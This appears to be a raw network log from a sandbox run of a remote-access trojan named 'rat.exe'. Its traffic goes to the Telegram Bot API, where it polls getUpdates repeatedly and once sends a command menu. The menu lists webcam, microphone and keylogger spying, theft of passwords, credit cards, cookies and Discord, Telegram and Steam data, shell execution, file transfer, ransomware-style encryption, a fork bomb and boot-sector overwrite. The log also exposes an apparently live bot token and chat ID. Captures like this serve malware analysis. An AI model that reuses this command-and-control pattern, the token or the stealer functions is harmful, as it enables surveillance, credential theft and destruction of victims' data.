Date: Sun, 12 Jan 2025 11:16:25 GMT
Content-Type: application/json
Content-Length: 23
Connection: keep-alive
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
GET

https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506653

rat.exe

Remote address:

149.154.167.220:443

Request

GET /bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506653 HTTP/1.1
Host: api.telegram.org

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
Date: Sun, 12 Jan 2025 11:16:26 GMT
Content-Type: application/json
Content-Length: 23
Connection: keep-alive
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
GET

https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506654

rat.exe

Remote address:

149.154.167.220:443

Request

GET /bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506654 HTTP/1.1
Host: api.telegram.org

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
Date: Sun, 12 Jan 2025 11:16:27 GMT
Content-Type: application/json
Content-Length: 23
Connection: keep-alive
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
GET

https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506655

rat.exe

Remote address:

149.154.167.220:443

Request

GET /bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506655 HTTP/1.1
Host: api.telegram.org

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
Date: Sun, 12 Jan 2025 11:16:29 GMT
Content-Type: application/json
Content-Length: 23
Connection: keep-alive
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
GET

https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506656

rat.exe

Remote address:

149.154.167.220:443

Request

GET /bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506656 HTTP/1.1
Host: api.telegram.org

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
Date: Sun, 12 Jan 2025 11:16:30 GMT
Content-Type: application/json
Content-Length: 23
Connection: keep-alive
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
GET

https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506657

rat.exe

Remote address:

149.154.167.220:443

Request

GET /bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506657 HTTP/1.1
Host: api.telegram.org

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
Date: Sun, 12 Jan 2025 11:16:31 GMT
Content-Type: application/json
Content-Length: 368
Connection: keep-alive
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
GET

https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/sendMessage?chat_id=-4791200354&text=%0A%20%F0%9F%8C%8E%20INFORMATION:%0A%20/ComputerInfo%0A%20/BatteryInfo%0A%20/Location%0A%20/Whois%0A%20/ActiveWindow%0A%0A%F0%9F%8E%A7%20SPYING:%0A%20/Webcam%20%3Ccamera%3E%20%3Cdelay%3E%0A%20/Microphone%20%3Cseconds%3E%0A%20/Desktop%0A%20/Keylogger%0A%0A%F0%9F%93%8B%20CLIPBOARD:%0A%20/ClipboardSet%20%3Ctext%3E%0A%20/ClipboardGet%0A%0A%F0%9F%93%8A%20TASKMANAGER:%0A%20/ProcessList%0A%20/ProcessKill%20%3Cprocess%3E%0A%20/ProcessStart%20%3Cprocess%3E%0A%20/TaskManagerDisable%0A%20/TaskManagerEnable%0A%0A%20/MinimizeAllWindows%0A%20/MaximizeAllWindows%0A%0A%F0%9F%92%B3%20STEALER:%0A%20/GetPasswords%0A%20/GetCreditCards%0A%20/GetHistory%0A%20/GetBookmarks%0A%20/GetCookies%0A%20/GetDesktop%0A%20/GetFileZilla%0A%20/GetDiscord%0A%20/GetTelegram%0A%20/GetSteam%0A%0A%F0%9F%92%BF%20CD-ROM:%0A%20/OpenCD%0A%20/CloseCD%0A%0A%F0%9F%92%BC%20FILES:%0A%20/DownloadFile%20%3Cfile/dir%3E%0A%20/UploadFile%20%3Cdrop/url%3E%0A%20/RunFile%20%3Cfile%3E%0A%20/RunFileAdmin%20%3Cfile%3E%0A%20/ListFiles%20%3Cdir%3E%0A%20/RemoveFile%20%3Cfile%3E%0A%20/RemoveDir%20%3Cdir%3E%0A%20/MoveFile%20%3Cfilr%3E%20%3Cfile%3E%0A%20/CopyFile%20%3Cfile%3E%20%3Cfile%3E%0A%20/MoveDir%20%3Cdir%3E%20%3Cdir%3E%0A%20/CopyDir%20%3Cdir%3E%20%3Cdir%3E%0A%0A%F0%9F%9A%80%20COMMUNICATION:%0A%20/Speak%20%3Ctext%3E%0A%20/Shell%20%3Ccommand%3E%0A%20/MessageBox%20%3Cerror/info/warn%3E%20%3Ctext%3E%0A%20/OpenURL%20%3Curl%3E%0A%20/SetWallpaper%20%3Cfile%3E%0A%20/SendKeyPress%20%3Ckeys%3E%0A%20/NetDiscover%20%3Cto%3E%0A%20/Uninstall%0A%0A%F0%9F%94%8A%20AUDIO:%20%0A%20/PlayMusic%20%3Cfile%3E%0A%20/AudioVolumeSet%20%3C0-100%3E%0A%20/AudioVolumeGet%0A%0A%F0%9F%92%A3%20EVIL:%0A%20/BlockInput%20%3Cseconds%3E%0A%20/Monitor%20%3Con/off/standby%3E%0A%20/DisplayRotate%20%3C0,90,180,270%3E%0A%20/EncryptFileSystem%20%3Cpassword%3E%0A%20/DecryptFileSystem%20%3Cpassword%3E%0A%20/ForkBomb%0A%20/BSoD%0A%20/OverwriteBootSector%0A%0A%F0%9F%92%A1%20POWER:%0A%20/Shutdown%0A%20/Reboot%0A%20/Hibernate%0A%20/Logoff%0A%0A%F0%9F%92%B0%20OTHER:%0A%20/Help%0A%20/About

rat.exe

Remote address:

149.154.167.220:443

Request

GET /bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/sendMessage?chat_id=-4791200354&text=%0A%20%F0%9F%8C%8E%20INFORMATION:%0A%20/ComputerInfo%0A%20/BatteryInfo%0A%20/Location%0A%20/Whois%0A%20/ActiveWindow%0A%0A%F0%9F%8E%A7%20SPYING:%0A%20/Webcam%20%3Ccamera%3E%20%3Cdelay%3E%0A%20/Microphone%20%3Cseconds%3E%0A%20/Desktop%0A%20/Keylogger%0A%0A%F0%9F%93%8B%20CLIPBOARD:%0A%20/ClipboardSet%20%3Ctext%3E%0A%20/ClipboardGet%0A%0A%F0%9F%93%8A%20TASKMANAGER:%0A%20/ProcessList%0A%20/ProcessKill%20%3Cprocess%3E%0A%20/ProcessStart%20%3Cprocess%3E%0A%20/TaskManagerDisable%0A%20/TaskManagerEnable%0A%0A%20/MinimizeAllWindows%0A%20/MaximizeAllWindows%0A%0A%F0%9F%92%B3%20STEALER:%0A%20/GetPasswords%0A%20/GetCreditCards%0A%20/GetHistory%0A%20/GetBookmarks%0A%20/GetCookies%0A%20/GetDesktop%0A%20/GetFileZilla%0A%20/GetDiscord%0A%20/GetTelegram%0A%20/GetSteam%0A%0A%F0%9F%92%BF%20CD-ROM:%0A%20/OpenCD%0A%20/CloseCD%0A%0A%F0%9F%92%BC%20FILES:%0A%20/DownloadFile%20%3Cfile/dir%3E%0A%20/UploadFile%20%3Cdrop/url%3E%0A%20/RunFile%20%3Cfile%3E%0A%20/RunFileAdmin%20%3Cfile%3E%0A%20/ListFiles%20%3Cdir%3E%0A%20/RemoveFile%20%3Cfile%3E%0A%20/RemoveDir%20%3Cdir%3E%0A%20/MoveFile%20%3Cfilr%3E%20%3Cfile%3E%0A%20/CopyFile%20%3Cfile%3E%20%3Cfile%3E%0A%20/MoveDir%20%3Cdir%3E%20%3Cdir%3E%0A%20/CopyDir%20%3Cdir%3E%20%3Cdir%3E%0A%0A%F0%9F%9A%80%20COMMUNICATION:%0A%20/Speak%20%3Ctext%3E%0A%20/Shell%20%3Ccommand%3E%0A%20/MessageBox%20%3Cerror/info/warn%3E%20%3Ctext%3E%0A%20/OpenURL%20%3Curl%3E%0A%20/SetWallpaper%20%3Cfile%3E%0A%20/SendKeyPress%20%3Ckeys%3E%0A%20/NetDiscover%20%3Cto%3E%0A%20/Uninstall%0A%0A%F0%9F%94%8A%20AUDIO:%20%0A%20/PlayMusic%20%3Cfile%3E%0A%20/AudioVolumeSet%20%3C0-100%3E%0A%20/AudioVolumeGet%0A%0A%F0%9F%92%A3%20EVIL:%0A%20/BlockInput%20%3Cseconds%3E%0A%20/Monitor%20%3Con/off/standby%3E%0A%20/DisplayRotate%20%3C0,90,180,270%3E%0A%20/EncryptFileSystem%20%3Cpassword%3E%0A%20/DecryptFileSystem%20%3Cpassword%3E%0A%20/ForkBomb%0A%20/BSoD%0A%20/OverwriteBootSector%0A%0A%F0%9F%92%A1%20POWER:%0A%20/Shutdown%0A%20/Reboot%0A%20/Hibernate%0A%20/Logoff%0A%0A%F0%9F%92%B0%20OTHER:%0A%20/Help%0A%20/About HTTP/1.1
Host: api.telegram.org

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
Date: Sun, 12 Jan 2025 11:16:31 GMT
Content-Type: application/json
Content-Length: 4962
Connection: keep-alive
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
GET

https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506642

rat.exe

Remote address:

149.154.167.220:443

Request

GET /bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506642 HTTP/1.1
Host: api.telegram.org

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
Date: Sun, 12 Jan 2025 11:16:32 GMT
Content-Type: application/json
Content-Length: 23
Connection: keep-alive
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
GET

https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506643

rat.exe

Remote address:

149.154.167.220:443

Request

GET /bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506643 HTTP/1.1
Host: api.telegram.org

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
Date: Sun, 12 Jan 2025 11:16:33 GMT
Content-Type: application/json
Content-Length: 23
Connection: keep-alive
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
GET

https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506644

rat.exe

Remote address:

149.154.167.220:443

Request

GET /bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506644 HTTP/1.1
Host: api.telegram.org

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
Date: Sun, 12 Jan 2025 11:16:34 GMT
Content-Type: application/json
Content-Length: 23
Connection: keep-alive
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
GET

https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506645

rat.exe

Remote address:

149.154.167.220:443

Request

GET /bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506645 HTTP/1.1
Host: api.telegram.org

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
Date: Sun, 12 Jan 2025 11:16:35 GMT
Content-Type: application/json
Content-Length: 23
Connection: keep-alive
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
GET

https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506646

rat.exe

Remote address:

149.154.167.220:443

Request

GET /bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506646 HTTP/1.1
Host: api.telegram.org

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
Date: Sun, 12 Jan 2025 11:16:36 GMT
Content-Type: application/json
Content-Length: 23
Connection: keep-alive
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
GET

https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506647

rat.exe

Remote address:

149.154.167.220:443

Request

GET /bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506647 HTTP/1.1
Host: api.telegram.org

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
Date: Sun, 12 Jan 2025 11:16:37 GMT
Content-Type: application/json
Content-Length: 23
Connection: keep-alive
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
GET

https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506648

rat.exe

Remote address:

149.154.167.220:443

Request

GET /bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506648 HTTP/1.1
Host: api.telegram.org

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
Date: Sun, 12 Jan 2025 11:16:38 GMT
Content-Type: application/json
Content-Length: 23
Connection: keep-alive
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
GET

https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506649

rat.exe

Remote address:

149.154.167.220:443

Request

GET /bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506649 HTTP/1.1
Host: api.telegram.org

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
Date: Sun, 12 Jan 2025 11:16:39 GMT
Content-Type: application/json
Content-Length: 23
Connection: keep-alive
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
GET

https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506650

rat.exe

Remote address:

149.154.167.220:443

Request

GET /bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506650 HTTP/1.1
Host: api.telegram.org

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
Date: Sun, 12 Jan 2025 11:16:41 GMT
Content-Type: application/json
Content-Length: 23
Connection: keep-alive
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
GET

https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506651

rat.exe

Remote address:

149.154.167.220:443

Request

GET /bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506651 HTTP/1.1
Host: api.telegram.org

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
Date: Sun, 12 Jan 2025 11:16:42 GMT
Content-Type: application/json
Content-Length: 23
Connection: keep-alive
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
GET

https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506652

rat.exe

Remote address:

149.154.167.220:443

Request

GET /bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506652 HTTP/1.1
Host: api.telegram.org

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
Date: Sun, 12 Jan 2025 11:16:43 GMT
Content-Type: application/json
Content-Length: 23
Connection: keep-alive
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
GET

https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506653

rat.exe

Remote address:

149.154.167.220:443

Request

GET /bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506653 HTTP/1.1
Host: api.telegram.org

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
Date: Sun, 12 Jan 2025 11:16:44 GMT
Content-Type: application/json
Content-Length: 23
Connection: keep-alive
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
GET

https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506654

rat.exe

Remote address:

149.154.167.220:443

Request

GET /bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506654 HTTP/1.1
Host: api.telegram.org

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
Date: Sun, 12 Jan 2025 11:16:45 GMT
Content-Type: application/json
Content-Length: 23
Connection: keep-alive
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
GET

https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506655

rat.exe

Remote address:

149.154.167.220:443

Request

GET /bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506655 HTTP/1.1
Host: api.telegram.org

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
Date: Sun, 12 Jan 2025 11:16:46 GMT
Content-Type: application/json
Content-Length: 23
Connection: keep-alive
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
GET

https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506656

rat.exe

Remote address:

149.154.167.220:443

Request

GET /bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506656 HTTP/1.1
Host: api.telegram.org

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
Date: Sun, 12 Jan 2025 11:16:47 GMT
Content-Type: application/json
Content-Length: 23
Connection: keep-alive
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
GET

https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506657

rat.exe

Remote address:

149.154.167.220:443

Request

GET /bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506657 HTTP/1.1
Host: api.telegram.org

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
Date: Sun, 12 Jan 2025 11:16:48 GMT
Content-Type: application/json
Content-Length: 23
Connection: keep-alive
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
GET

https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506658

rat.exe

Remote address:

149.154.167.220:443

Request

GET /bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506658 HTTP/1.1
Host: api.telegram.org

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
Date: Sun, 12 Jan 2025 11:16:49 GMT
Content-Type: application/json
Content-Length: 23
Connection: keep-alive
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
GET

https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506659

rat.exe

Remote address:

149.154.167.220:443

Request

GET /bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506659 HTTP/1.1
Host: api.telegram.org

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
Date: Sun, 12 Jan 2025 11:16:50 GMT
Content-Type: application/json
Content-Length: 23
Connection: keep-alive
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
GET

https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506660

rat.exe

Remote address:

149.154.167.220:443

Request

GET /bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506660 HTTP/1.1
Host: api.telegram.org

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
Date: Sun, 12 Jan 2025 11:16:51 GMT
Content-Type: application/json
Content-Length: 23
Connection: keep-alive
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
GET

https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506661

rat.exe

Remote address:

149.154.167.220:443

Request

GET /bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506661 HTTP/1.1
Host: api.telegram.org

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
Date: Sun, 12 Jan 2025 11:16:52 GMT
Content-Type: application/json
Content-Length: 23
Connection: keep-alive
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
GET

https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506662

rat.exe

Remote address:

149.154.167.220:443

Request

GET /bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506662 HTTP/1.1
Host: api.telegram.org

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
Date: Sun, 12 Jan 2025 11:16:53 GMT
Content-Type: application/json
Content-Length: 23
Connection: keep-alive
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
GET

https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506663

rat.exe

Remote address:

149.154.167.220:443

Request

GET /bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506663 HTTP/1.1
Host: api.telegram.org

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
Date: Sun, 12 Jan 2025 11:16:54 GMT
Content-Type: application/json
Content-Length: 23
Connection: keep-alive
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
GET

https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506664

rat.exe

Remote address:

149.154.167.220:443

Request

GET /bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506664 HTTP/1.1
Host: api.telegram.org

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
Date: Sun, 12 Jan 2025 11:16:56 GMT
Content-Type: application/json
Content-Length: 23
Connection: keep-alive
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
GET

https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506665

rat.exe

Remote address:

149.154.167.220:443

Request

GET /bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506665 HTTP/1.1
Host: api.telegram.org

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
Date: Sun, 12 Jan 2025 11:16:57 GMT
Content-Type: application/json
Content-Length: 23
Connection: keep-alive
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
GET

https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506666

rat.exe

Remote address:

149.154.167.220:443

Request

GET /bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506666 HTTP/1.1
Host: api.telegram.org

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
Date: Sun, 12 Jan 2025 11:16:58 GMT
Content-Type: application/json
Content-Length: 23
Connection: keep-alive
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
GET

https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506667

rat.exe

Remote address:

149.154.167.220:443

Request

GET /bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506667 HTTP/1.1
Host: api.telegram.org

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
Date: Sun, 12 Jan 2025 11:16:59 GMT
Content-Type: application/json
Content-Length: 23
Connection: keep-alive
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
GET

